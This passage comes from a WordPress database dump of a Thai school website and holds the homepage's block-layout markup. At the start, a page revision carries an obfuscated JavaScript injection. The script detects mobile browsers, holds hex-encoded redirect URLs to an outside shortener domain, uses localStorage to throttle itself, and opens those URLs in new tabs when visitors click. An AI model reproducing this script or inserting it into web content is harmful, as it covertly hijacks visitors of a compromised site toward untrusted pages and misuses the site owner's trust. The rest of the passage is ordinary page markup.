u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:02:38','2024-07-27 14:02:38','',19,'http://watprato.ssk.in.th/?p=49',0,'revision','',0),
(53,1,'2024-07-27 21:03:13','2024-07-27 14:03:13','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 